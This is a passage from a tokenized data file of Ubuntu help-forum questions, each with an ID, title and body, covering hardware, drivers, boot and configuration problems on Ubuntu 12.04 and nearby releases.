0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 170 ) minutes . conveyance self-test routine recommended polling time : ( 5 ) minutes . sct capabilities : ( 0x3035 ) sct status supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x002f 200 200 051 pre-fail always - 0 3 spin_up_time 0x0027 176 173 021 pre-fail always - 4183 4 start_stop_count 0x0032 100 100 000 old_age always - 774 5 reallocated_sector_ct 0x0033 200 200 140 pre-fail always - 0 7 seek_error_rate 0x002e 200 200 000 old_age always - 0 9 power_on_hours 0x0032 093 093 000 old_age always - 5518 10 spin_retry_count 0x0032 100 100 000 old_age always - 0 11 calibration_retry_count 0x0032 100 100 000 old_age always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 772 192 power-off_retract_count 0x0032 200 200 000 old_age always - 39 193 load_cycle_count 0x0032 200 200 000 old_age always - 736 194 temperature_celsius 0x0022 118 111 000 old_age always - 29 196 reallocated_event_count 0x0032 200 200 000 old_age always - 0 197 current_pending_sector 0x0032 200 200 000 old_age always - 0 198 offline_uncorrectable 0x0030 200 200 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 200 multi_zone_error_rate 0x0008 200 200 000 old_age offline - 0 smart error log version : 1 no errors logged smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline completed without error 00 % 5514 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay .
141863	choices of tools for graphical performance indications ?	on windows i had some choices for tools that could display how hard my cpu or disk was working , in a graphical form so i could get a quick view of what 's going on . is there some analogous set of tools for ubuntu 12.04 ? i 've done some simple-minded searches , but i have n't found anything .
141865	3.5 audio jack issue does n't work on a dell studio 1749	i 'm on a dell studio 1749 x64 . internal speakers work just fine . i have three jacks near the front,2 are for audio and 1 for input . when i plug my speakers into the audio ( headphone ) jack ( s ) i get nothing . i 've tried the alsamixer , switching the sound card , making sure nothing was muted , etc . with alsamixer open , i 've tried to force it to recognize by unplugging and replugging , and it then mutes the channel in alsamixer which is easy enough to change but it does n't fix anything . i 've also tried adding lines to alsa-base.conf , again nothing . the added lines to .conf are as follows : options snd-hda-intel model=dell , options snd-hda-intel model=stac92xx , options snd-hda-intel model=dell-m81 , options snd-hda-intel model=gateway , i know i only need 1 line but i 'm not sure of my model so i left them all in there for extra measure . i thought they could be conflicting so i added ( and rebooted ) 1 at a time . no luck . i 'm on a fresh install of 12.04 lts and i 'll pastebin a log of any information needed .
141866	keep ubuntu server running on a laptop with the lid closed ?	i decided to use my eee pc 1001ha as a home server . i have it connected through wi-fi to the router , running ubuntu server 12.04 . everything works fine except this annoying problem : when i close the lid , the ssh server stops working and , i guess , wlan0 too . tried the bios and nothing , no option about the lid . my wlan0 is a ralink rt3090 . tried ls -lrt /var/log between lid derivatives , but i ca n't understand those satanic logs . i can share them if needed . pm-powersave.log seems to be updated between lid movements . so i guess i 've to disable this `` powersave '' service . can i do this ? i do n't mind if the server runs all day . remember that there is no ui , this is a netbook with a lid and its connected to the ac adapter . edit : this is just a workaround but i am able to click the power-button and close the lid quickly . this way the server boots normally and connects to the wireless network automatically . ( found here )
141868	why wo n't my computer connect to wireless ?	why ca n't i connect to the internet wirelessly ? i confirmed that all of my router information is correct and have tried this several times , but my computer still wont connect to the internet via my wireless network .
141869	xubuntu kernel upgrade to 3.4	i see that the 3.4 stable kernel was released a couple days ago . i 'm looking for some onformation on how to upgrade from my 3.2.0-24-generic on my msi wind netbook . the reason for this is that i have several problems with xfce freezing after wakeup , among a couple others i simply could n't figure out . my question is , a. is it worth to upgrade ? b. how would i go about doing that ? thank you for your answer
141870	i am looking for canon pixma mp250	i am looking for drivers for a canon pixma mp250 for ubuntu 12.04 lts . anyone knows how to install one ?
141875	create new password for a user which one 's password is already removed	i recently removed my user password and now when i want to install any software or do something major , it wants a password . i thought that removing password would also remove sudo password . now i need your help to remove all passwords or recover my last password . my best regards .
141877	how do i stop opendns from redirecting single-word searches ?	every time i search for a single word in the firefox address bar i am redirected to opendns guide search rather than my default search engine . how do i stop this ? i have tried changing keyword.url in about : config , which is what every single solution to this problem i have seen says to do , but it has n't worked . single-word searches still go to opendns . searches with multiple words go to the default search engine . does anybody know how to fix this ? it 's driving me nuts ! i want to use a good search engine , not the piece of garbage that is opendns guide ! thanks for your help ! edit : okay , i 've found a workaround . i installed the the add-on instantfox , which lets you set search keywords . i know that this feature is already built into firefox , but i was able to use instantfox 's `` standard search without shortcuts '' option and set a standard search url . everything works fine now . not the most satisfactory fix , but at least it works .
141879	error 1962 : no operating system found after installing 12.04 ( lenovo thinkcentre )	i just installed a fresh copy of 12.04 on a new lenovo thinkcentere from a usb drive , and when i restarted after installation , the boot sequence did n't find the os . instead i got the 'no operating system found ' error . when i started ubuntu from the usb , i could see the hdd and that it had all the installed files . i just could n't boot into it . it appeared that grub was not at the right place ... or that there was something funky with the mbr . what is the simplest way to fix these sorts of errors ? thank you , edit : it appears the problem might have to do with uefi and grub ...
141881	system reports only 4 gb or ram	to make a long story short , ubuntu 12.04 64-bit is only detecting 4 gb of ram even though 8 gb are installed . here 's what i 've done so far to rectify the problem : replaced both ram sticks , issue persisted . replaced motherboard , issue persisted . booted from live cd to see if it was a software issue , persisted . bios detects 8 gb of memory properly but shows it as being in `` single channel mode '' . when i first put together this system ( only a mere 3 weeks ago ) , it was detecting the proper amount of ram just fine . shortly thereafter , i installed a new power supply in the machine ( as the original one i had ordered ended up being too small for my the enclosure i have ) . it seems to me that the problem started after i installed the new power supply . i 've replaced every component in the system since then troubleshooting , but not the power supply . could this in some way be the problem ? if there 's some sort of power flow problem , would it cause memory to run in single channel mode ? everything else appears to be working fine ... hard drive , blu-ray drive , only thing is that within system information , i see that the reported cpu speed sometimes jumps between 2700 mhz and 800 mhz . is that normal for a quad-core system under ubuntu 12.04 ? thank you . output of uname -m : x86_64 output of free -m : total used free shared buffers cached mem : 3680 3072 608 0 150 1755 -/+ buffers/cache : 1166 2513 swap : 7912 0 7912 `*-firmware description : bios vendor : american megatrends inc. physical id : 0 version : p1.50 date : 02/09/2012 size : 64kib capacity : 4032kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb biosbootspecification *-memory description : system memory physical id : 6 slot : system board or motherboard size : 8gib *-bank:0 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : 1333el series vendor : undefined physical id : 0 serial : 00000000 slot : a1_dimm0 size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : array1_partnumber1 vendor : a1_manufacturer1 physical id : 1 serial : a1_sernum1 slot : a1_dimm1 size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-cache:0 description : l1 cache physical id : d slot : l1 cache size : 512kib capacity : 512kib clock : 1ghz ( 1.0ns ) capabilities : pipeline-burst internal write-back unified *-cache:1 description : l2 cache physical id : e slot : l2 cache size : 4mib capacity : 4mib clock : 1ghz ( 1.0ns ) capabilities : pipeline-burst internal write-back unified here 's the bios e820 information : may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-provided physical ram map : may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 0000000000000000 - 000000000009ec00 ( usable ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 000000000009ec00 - 00000000000a0000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000000e0000 - 0000000000100000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 0000000000100000 - 00000000bf77c000 ( usable ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000bf77c000 - 00000000bf7c5000 ( acpi nvs ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000bf7c5000 - 00000000bf7cd000 ( acpi data ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000bf7cd000 - 00000000bf7d1000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000bf7d1000 - 00000000bf7d6000 ( acpi nvs ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000bf7d6000 - 00000000bfa43000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000bfa43000 - 00000000bfa4a000 ( acpi nvs ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000bfa4a000 - 00000000bfa72000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000bfa72000 - 00000000bfc75000 ( acpi nvs ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000bfc75000 - 00000000bff00000 ( usable ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000e0000000 - 00000000f0000000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000fec00000 - 00000000fec01000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000fec10000 - 00000000fec11000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000fed00000 - 00000000fed01000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000fed61000 - 00000000fed71000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000fed80000 - 00000000fed90000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 00000000ff000000 - 0000000100000000 ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] bios-e820 : 0000000100001000 - 000000012f000000 ( usable ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] nx ( execute disable ) protection : active may 25 04:48:08 arcturus kernel : [ 0.000000 ] dmi 2.7 present . may 25 04:48:08 arcturus kernel : [ 0.000000 ] dmi : to be filled by o.e.m . to be filled by o.e.m./a75m-itx , bios p1.50 02/09/2012 may 25 04:48:08 arcturus kernel : [ 0.000000 ] e820 update range : 0000000000000000 - 0000000000010000 ( usable ) == > ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] e820 remove range : 00000000000a0000 - 0000000000100000 ( usable ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] no agp bridge found may 25 04:48:08 arcturus kernel : [ 0.000000 ] last_pfn = 0x12f000 max_arch_pfn = 0x400000000 may 25 04:48:08 arcturus kernel : [ 0.000000 ] mtrr default type : uncachable may 25 04:48:08 arcturus kernel : [ 0.000000 ] mtrr fixed ranges enabled : may 25 04:48:08 arcturus kernel : [ 0.000000 ] 00000-9ffff write-back may 25 04:48:08 arcturus kernel : [ 0.000000 ] a0000-bffff write-through may 25 04:48:08 arcturus kernel : [ 0.000000 ] c0000-cefff write-protect may 25 04:48:08 arcturus kernel : [ 0.000000 ] cf000-e7fff uncachable may 25 04:48:08 arcturus kernel : [ 0.000000 ] e8000-fffff write-protect may 25 04:48:08 arcturus kernel : [ 0.000000 ] mtrr variable ranges enabled : may 25 04:48:08 arcturus kernel : [ 0.000000 ] 0 base 0000000000 mask ff00000000 write-back may 25 04:48:08 arcturus kernel : [ 0.000000 ] 1 base 00bff00000 mask fffff00000 uncachable may 25 04:48:08 arcturus kernel : [ 0.000000 ] 2 base 00c0000000 mask ffc0000000 uncachable may 25 04:48:08 arcturus kernel : [ 0.000000 ] 3 disabled may 25 04:48:08 arcturus kernel : [ 0.000000 ] 4 disabled may 25 04:48:08 arcturus kernel : [ 0.000000 ] 5 disabled may 25 04:48:08 arcturus kernel : [ 0.000000 ] 6 disabled may 25 04:48:08 arcturus kernel : [ 0.000000 ] 7 disabled may 25 04:48:08 arcturus kernel : [ 0.000000 ] tom2 : 000000013f000000 aka 5104m may 25 04:48:08 arcturus kernel : [ 0.000000 ] x86 pat enabled : cpu 0 , old 0x7040600070406 , new 0x7010600070106 may 25 04:48:08 arcturus kernel : [ 0.000000 ] original variable mtrrs may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 0 , base : 0gb , range : 4gb , type wb may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 1 , base : 3071mb , range : 1mb , type uc may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 2 , base : 3gb , range : 1gb , type uc may 25 04:48:08 arcturus kernel : [ 0.000000 ] total ram covered : 3071m may 25 04:48:08 arcturus kernel : [ 0.000000 ] found optimal setting for mtrr clean up may 25 04:48:08 arcturus kernel : [ 0.000000 ] gran_size : 64k chunk_size : 2m num_reg : 3 lose cover ram : 0g may 25 04:48:08 arcturus kernel : [ 0.000000 ] new variable mtrrs may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 0 , base : 0gb , range : 2gb , type wb may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 1 , base : 2gb , range : 1gb , type wb may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 2 , base : 3071mb , range : 1mb , type uc may 25 04:48:08 arcturus kernel : [ 0.000000 ] e820 update range : 00000000bff00000 - 0000000100000000 ( usable ) == > ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] last_pfn = 0xbff00 max_arch_pfn = 0x400000000 may 25 04:48:08 arcturus kernel : [ 0.000000 ] found smp mp-table at [ ffff8800000fcf10 ] fcf10 may 25 04:48:08 arcturus kernel : [ 0.000000 ] initial memory mapped : 0 - 20000000 may 25 04:48:08 arcturus kernel : [ 0.000000 ] 7 disabled may 25 04:48:08 arcturus kernel : [ 0.000000 ] tom2 : 000000013f000000 aka 5104m may 25 04:48:08 arcturus kernel : [ 0.000000 ] x86 pat enabled : cpu 0 , old 0x7040600070406 , new 0x7010600070106 may 25 04:48:08 arcturus kernel : [ 0.000000 ] original variable mtrrs may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 0 , base : 0gb , range : 4gb , type wb may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 1 , base : 3071mb , range : 1mb , type uc may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 2 , base : 3gb , range : 1gb , type uc may 25 04:48:08 arcturus kernel : [ 0.000000 ] total ram covered : 3071m may 25 04:48:08 arcturus kernel : [ 0.000000 ] found optimal setting for mtrr clean up may 25 04:48:08 arcturus kernel : [ 0.000000 ] gran_size : 64k chunk_size : 2m num_reg : 3 lose cover ram : 0g may 25 04:48:08 arcturus kernel : [ 0.000000 ] new variable mtrrs may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 0 , base : 0gb , range : 2gb , type wb may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 1 , base : 2gb , range : 1gb , type wb may 25 04:48:08 arcturus kernel : [ 0.000000 ] reg 2 , base : 3071mb , range : 1mb , type uc may 25 04:48:08 arcturus kernel : [ 0.000000 ] e820 update range : 00000000bff00000 - 0000000100000000 ( usable ) == > ( reserved ) may 25 04:48:08 arcturus kernel : [ 0.000000 ] last_pfn = 0xbff00 max_arch_pfn = 0x400000000 may 25 04:48:08 arcturus kernel : [ 0.000000 ] found smp mp-table at [ ffff8800000fcf10 ] fcf10 may 25 04:48:08 arcturus kernel : [ 0.000000 ] initial memory mapped : 0 - 20000000
141889	how do i get two x displays across two monitors , working independently	i 'm running an nvidia card on a machine running a fresh install of 12.04 . i 'm using the drivers available from the main repos . i have the program 'nvidia-settings ' available . i have an x display on each monitor . however , when i switch desktops on one monitor , the desktop on the second monitor also changes . this is a departure from the behaviour that i had on 10.10 , where i could control each monitors desktop display independently . is there any way to get this behaviour back on 12.04 ?
141890	is it true that ubuntu effect on hdd longevity ?	is it true that `` ubuntu may be killing my laptop 's hard drive '' ? ? please explain ( if possible ) . http : //hardware.slashdot.org/story/07/10/30/1742258/ubuntu-may-be-killing-your-laptops-hard-drive http : //forums.techguy.org/linux-unix/974066-ubuntus-excessive-head-parking-destroying.html i am using ubuntu 12.04 64 bit on asus k53sv notebook .
141896	logitech wireless keyboard & mouse not working aftesr upgrade to 12.04 ?	i upgraded my dell dimension 9200c to 12.04 precise pangolin with no issues , i ran it fine for a night but when i went back in a couple days later my logitech wireless keyboard k350 and m510 mouse were n't active when booted . i can boot into an older version from the main the boot screen the mouse and keyboard work , but the network stack is gone . it says the networking manager on this version is not compatible . i 'm scratching my head , it is n't the mouse and keyboard , they work fine on my dual boot , and they load fine in knoppix . they did work fine on 12.04 for 1 night . open to suggestions before i re-install completely .
141902	hard drive crashed while installing ubuntu 12.04 on a dual-boot that had win7 + mint 12	i had a separate partition made for linux mint which installed just fine and i had used for about a month ( new linux user ) , while having windows 7 dual-booted so i could play games on steam . i decided to switch to ubuntu , and i tried installing it the same way i installed mint . i put ubuntu on a usb drive , booted with usb , installed from ubuntu , clicked on something else ( other then over windows ) , and picked the partition i made for mint . i formatted it and used the ext4 filesystem and no swap space , the installation went just fine . at the end it told me to restart and when i did , not only did my ubuntu partition go missing , so did my d : \ drive which had all of my steam games , some school files , and my system image folder ( unfortunately ) . this is my partitions viewed from windows 7 what are my options edit : im willing to reset my laptop to factory if i have to , to fix it edit2 : i have an asus k53-sv laptop edit3 : i can see my drives again in gparted but how can i fix grub so i can run ubuntu edit4 : grub does n't seem to be installed when i look for it in the ubuntu software centre ( keep in mind im a brand new linux user )
141903	can i dual boot 12.04 with vista ?	recently i 've grown an interest about ubuntu and all its new characteristics , but one thing that concerns me is that in windows vista i currently run my itunes library , and programs such as microsoft office , and if i installed ubuntu i would lose these files . is it possible to install ubuntu 12.04 without uninstalling windows vista , and run the both os 's in the same computer ?
141906	how can i get the specific colors that are being used in my vim ruby plugin / theme ?	i looking for the specific hex colors that are being used in my color scheme when i 'm editing ruby files with vim . how would i find such information ?
141908	why does upstart need `setgid` when i have `setuid` and the user is a member of the group ?	i 'm attempting to configure upstart to run a small utility that needs to access a tty as a system-wide daemon . when run from the command-line , the utility remains in the foreground and does n't exit until a ctrl+c ; i 've therefore omitted the expect stanza and upstart is correctly tracking the pid . i 've also created an unprivileged account for the daemon using adduser -- system -- no-create-home -- disabled-login avrlirc . on my system , the tty the utility needs to access is installed as : crw-rw -- -- 1 root dialout 166 , 0 may 24 19:25 ttyacm0 so i added the user avrlirc ( created above ) to the dialout group . when i run the utility as avrlirc everything works as expected . i added the stanza setuid avrlirc to the upstart configuration file , and the job fails with `` ca n't open tty '' . if i omit the setuid stanza , it works ( so it 's likely a permissions thing ) . if i add the setgid dialout stanza alongside the setuid , it also works . so , why do i need setgid when i already have setuid and the user is a member of the appropriate groupâwhy is n't that enough ? for reference , the upstart job config file is : start on runlevel [ 2345 ] stop on runlevel [ 016 ] console log setuid avrlirc setgid dialout exec /usr/local/bin/avrlirc2udp -f -h -h < ip_address > -t /dev/ttyacm0 where < ip_address > is the ipv4 address of the local box and within 192.168.0.0/16 .
141911	`` can not find -lglew_x86_64 '' error when trying to link glew	i am trying to build a project that uses glew ( using makefile provided by the developers of the project ) . it gives the following error message : [ link ] ./dist/linux/x86_64/gpusph /usr/bin/ld : can not find -lglew_x86_64 collect2 : ld returned 1 exit status make : *** [ all ] error 1 i already have the libglew1.5 and libglewmx1.5 packages installed ( both runtime and development environment ) from synaptic package managers . are these the 32 bit or 64 bit versions ? ( i 'm using ubuntu 11.04 64 bit ) if those are 32 bit versions , are there 64 bit versions available somewhere in the repositories ? if i have to compile from the source , how do i install the libraries so the linker can find it ?
141921	jupiter applet default setting	i would like to start jupiter in power saving mode but it always start in max performance mode . i dopnt have a laptop.im running it on an assembled desktop . any way to do it ? edit for jasmines there are no such files as you mentioned the contents of the folder are ashhab @ ubuntu : ~ $ cd /var/jupiter/ ashhab @ ubuntu : /var/jupiter $ ls available_resolutions resolution_saved touchpad_saved vga_saved cpu_mode rotation_saved unknown ashhab @ ubuntu : /var/jupiter $
141926	gateway za8 netbook graphics issue	the graphics keep tearing and are barely usable anytime i try to use my netbook . and i did a full install with ubuntu so i 'm pretty much stuck . these are the specs of the netbook : processor amd athlon™ 64 l110 single-core processor ( 1.2ghz , 800mhz fsb , 512kb l2 cache ) 6 operating system genuine windows vista® home basic ( 32-bit ) with sp1 display 11.6 '' hd wxga ultrabright™ led-backlit display ( 1366 x 768 resolution , 16:9 aspect ratio ) 7 memory 2048mb ddr2 533mhz sdram single channel memory8 hard drive 250gb sata hard drive2 color classic and elegant design with cherry red finish wireless network 802.11b/g wi-fi certified®3 adapter ac adapter application software microsoft® works , microsoft® money essentials , microsoft® office home and student 2007 ( 60-day complimentary trial period ) 1 battery 6-cell lithium ion ( 5200mah ) chassis chassis with ati radeon® x1270 graphics and amd rs690e chipset8 dimensions ( box ) 3.1 '' ( h ) x 14.8 '' ( w ) x 10.1 '' ( d ) or 80mm ( h ) x 376mm ( w ) x 256mm ( d ) dimensions ( system ) 1.03 '' ( h ) x 11.26 '' ( w ) x 7.99 '' ( d ) or 26.4mm ( h ) x 286mm ( w ) x 203mm ( d ) external ports ( 3 ) usb 2.0 , vga connector keyboard and mouse keyboard with multi-gesture touchpad media card reader multi-in-1 digital media card reader ( memory stick® , memory stick pro™ , multimediacard , secure digital™ , xd-picture card™ ) network 10/100 ethernet lan ( rj-45 port ) what can i do ?
141928	what is difference between # ! /bin/sh and # ! /bin/bash ?	if i write , # ! /bin/bash echo `` foo '' or # ! /bin/sh echo `` foo '' both yields same . i have seen some scripts starting with # ! /bin/sh or # ! /bin/bash . is there any difference between them ?
141933	connecting to ubuntu box	i am trying to remote desktop from one ubuntu machine to another . i can ssh from client to server successfully . on the server machine i set up everything that is mentioned in the guides ( remote desktop preferences ) , but every time i am trying to remote desktop to server from client i get error `` unable to connect '' . do i need to set anything up on the server besides what i already did ? can i see somewhere why i could n't connect ?
141935	how do i install broadcom wireless driver after compile a custom kernel ?	i have compiled a custom kernel ( ck-patchs , ubuntu-patchs ) for my netbook , everything workis good , but not wireless , i ca n't install `` wireless broadcom sta driver '' i got this message : desculpe , a instalação deste driver falhou . por favor , dê uma olhada no arquivo de log para obter detalhes : /var/log/jockey.log that is saying to i take a look on jockey.log because ca n't install the driver so jockey.log : http : //pastebin.com/preqbcus
141936	ubuntu 11.10 gnome shell stuck in fallback mode	i installed ubuntu 11.10 , gnome shell is stuck in fallback mode ( not able to change to fallback mode off from 'system settings ' . choose 'system information ' then 'graphics ' ) , i think it can be a video drivers issue . thinkpad t400 after a fresh install monitor shows `` unknown '' any idea how i can fix this ?
141938	monospace font too thin and spindly in chrome	could be related to this but i could n't solve the problem with the fixes there . the issue is especially apparent on websites that use monospace font . for example : http : //www.hastebin.com/gosiqosoti.pl is nearly unreadable in chrome , although i just tried it in firefox 12 and it looks a bit better . this is on 12.04 with the latest chrome stable . msttcorefonts are installed .
141939	how do i submit .jar file to the ubuntu software center	i am writing an app using java swing for all platforms . after that i want to add this app to ubuntu software center for free is it possible ? my app is just one *.jar file , its helping to play card games . i dont know python language and saying the truth - dont want to learn it now . what should i do to be able to submit my app ?
141940	how to boot live iso images ?	i found that it can be done with loopback as follows menuentry `` lucid iso '' { loopback loop ( hd0,1 ) /boot/iso/ubuntu-10.04-desktop-i386.iso linux ( loop ) /casper/vmlinuz boot=casper iso-scan/filename=/boot/iso/ubuntu-10.04-desktop-i386.iso noprompt noeject initrd ( loop ) /casper/initrd.lz } but it works only with ubuntu or its derivatives . how it should be written if i want to boot other live images like fedora , cent , opensuse etc . ? edit : i found some other entries but all of them are probably debian based . menuentry `` linux mint 10 gnome iso '' { loopback loop /linuxmint10.iso linux ( loop ) /casper/vmlinuz file=/cdrom/preseed/mint.seed boot=casper initrd=/casper/initrd.lz iso-scan/filename=/linuxmint10.iso noeject noprompt splash -- initrd ( loop ) /casper/initrd.lz } menuentry `` dban iso '' { loopback loop /dban.iso linux ( loop ) /dban.bzi nuke= '' dwipe '' iso-scan/filename=/dban.iso silent -- } menuentry `` tinycore iso '' { loopback loop /tinycore.iso linux ( loop ) /boot/bzimage -- initrd ( loop ) /boot/tinycore.gz } menuentry `` systemrescuecd '' { loopback loop /systemrescuecd.iso linux ( loop ) /isolinux/rescuecd isoloop=/systemrescuecd.iso setkmap=us docache dostartx initrd ( loop ) /isolinux/initram.igz } edit2 : how to chainload grub and syslinux from grub2 ? edit3 : i want to boot other live images without any removable devices and use grub2 so need menu entries specific to grub2 .
141941	i accidentally made my terminal open another terminal when it starts . how can i fix it ?	i wanted to have it so that when i open a terminal , it is opened maximized . however i set the default profile to open a terminal fullscreen when i open a terminal and ... recursion . the terminals open so fast that i ca n't access the profile options , and when i ctrl-c or ctrl-z , nothing happens or if i do it faster , then all of the terminals close . how can i fix this , without a terminal ? i 'm using a netbook remix of 10.04 i believe . i made this change using the dropdown menu of an open terminal . it opened a dialog box , i chose to edit the default profile , and this opened another dialog box with multiple tabs , i changed to another tab and there was an option to `` run your own command '' in which i put `` gnome-terminal -- window -- maximize '' , thinking that this would replace the current command that opens a terminal , not run it when a terminal opens . solved : found this , top answer worked . summary : run command using alt-f2 , use gconf-editor to uncheck the use-custom-command bool .
141946	one-way syncing through ubuntu one	i want a remote backup for a few importantfiles ( tm ) on my desktop computer . i set up a ubuntu one folder so to have those files remotely mirrored . that 's pretty handy since i can access my importantfiles through the web and across multiple devices . the point with this setup is that if i accidentally wipe away my importantfiles through my smartphone , changes will be synced back and i will lose files on my desktop too . that does n't sound safe . i am wondering if ubuntu one is the right tool to achieve my goal . should i better use ubuntu one to sync music , pictures and use something else for my importantfiles ? any tips about correct usage of ubuntu one ? any tips about my scenario and my goal ?
141947	headset input setting as default	i used to be able to use my arctic p311 bluetooth headset for both , input and output , but now i ca n't . well , it works fine as an output device but when i try to set it as a default input device in sound settings , settings windows breaks and goes down . at first it showed popups to report the problem but now it does n't . it just dies now . i do n't even know what is the problem . how do i launch that application from terminal to see what it outputs ? and/or maybe someone knows a potential problem ? p.s . ubuntu 12.04 x64 edit thanks to the reply , i can now change input source but i now ca n't change output source . but it 's because sound settings application crashes instantly as it shows up .
141956	i cant see anything in the dash home	since i upgrade to 11.10 i cant see my applications . the software center does n't work and i do n't know how to fix it . please help me ,
141961	minimize , maximize , close buttons dissapear	i noticed that the minimize , maximize and close buttons on top of every window would randomly disappear and i noticed it is after i open transmission . going to compiz fusion - > settings and unclicking the maximize option will reveal the maximize , minimize and close buttons however my whole computer freezes and i can not access anything else including terminal . can someone please help me with my problem ?
141972	when installing nvidia drivers it doesnt resuming suspend	i 'm using ubuntu 12.04 and i installed recommended nvidia drivers from `` additional drivers . '' now when i try to resume from suspend the monitor does n't show anything and i have to restart my computer . why does this happen and how can i fix it ?
141974	conky autostart problem	i am using ubuntu12.04 with gnome3.4 . i installed conky to display my system information . and everything is good except that conky ca n't autostart when the system starts . i have configure gnome-session-properties with /usr/share/conkycolors/bin/conkystart but it does n't work . so how can i have my conky autostart ? thank you .
141977	how to get the language indicator to change when switching between active applications ?	before upgrading to 12.04 , the language indicator used to change every time i was sending libreoffice to the background and making firefox the active application/window . this was convenient enough as i did n't have to manually change the input language each time i needed to search for a term in english in the web or in a dictionary , and then change it again to greek in order to continue typing . now , this is exactly what 's happening after upgrading to 12.04 . how can i manage to make the language flag change every time i switch between applications ?
141981	how do i disable multimedia buttons on my laptop ? the system sees them as a trackpad resulting in erratic behavior .	i have this sony vaio , vgn-cs16t , running 12.04 . it is a chinese computer that has not been sold outside of south east asian markets . i do n't read chinese , so i ca n't find a lot of support for it . there are a few buttons at the top of the keyboard , rewind , play , fast forward , av mode , volume down , volume up and a capture button . whenever i hit one of those buttons , the whole system freaks out . when i hit the capture button , seemingly random applications or documents open . when i hit any of the media buttons the mouse behaves erratically . the right button stops working all together , and sometimes the left button becomes select everything and wont let me deselect . id love to be able to use these buttons . if nothing else , i 'd love to be able to disable them until i can get them working again . some other behavior i 'm experiencing , and asking in separate posts ... the brightness up and down buttons dont work . and after the machine goes to sleep , upon waking up the keyboard nolonger works . that might be related to this . thanks for any help . output of xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sony vaio keys id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ uvc camera ( 05ca:183f ) id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] contents of /var/log/xorg.0.log ( truncated to remove graphics card info ) : [ 25.182 ] ( == ) randr enabled [ 25.182 ] ( ii ) initializing built-in extension generic event extension [ 25.182 ] ( ii ) initializing built-in extension shape [ 25.182 ] ( ii ) initializing built-in extension mit-shm [ 25.182 ] ( ii ) initializing built-in extension xinputextension [ 25.182 ] ( ii ) initializing built-in extension xtest [ 25.182 ] ( ii ) initializing built-in extension big-requests [ 25.182 ] ( ii ) initializing built-in extension sync [ 25.182 ] ( ii ) initializing built-in extension xkeyboard [ 25.182 ] ( ii ) initializing built-in extension xc-misc [ 25.182 ] ( ii ) initializing 